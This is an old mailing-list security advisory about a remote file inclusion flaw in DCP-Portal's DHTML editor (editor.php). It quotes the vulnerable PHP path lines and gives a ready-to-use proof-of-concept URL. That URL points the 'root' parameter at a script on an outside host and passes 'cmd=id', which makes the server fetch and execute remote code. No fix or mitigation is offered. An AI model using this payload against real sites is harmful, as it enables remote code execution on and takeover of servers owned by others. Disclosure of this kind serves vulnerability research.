[Kurdish Security # 8] DCP-Portal Remote File Include Vulnerability [Editor DHTML]

Sat, 17 Jun 2006 13:41:24 -0700 

# Kurdish Security Advisory

# irc.gigachat.net #kurdhack 

# http://www.milw0rm.com/exploits/1905

# Editor DHTML Scripting bugz 


$url_path_editor = "$root_url/library/editor/"; 

$abs_path_editor = "$root/library/editor/"; 


?>


Proof Of Concept 


http://www.site.com/[dcpath]/library/editor/editor.php?root=http://www.yourscripts.com/x.txt?cmd=id

Reply via email to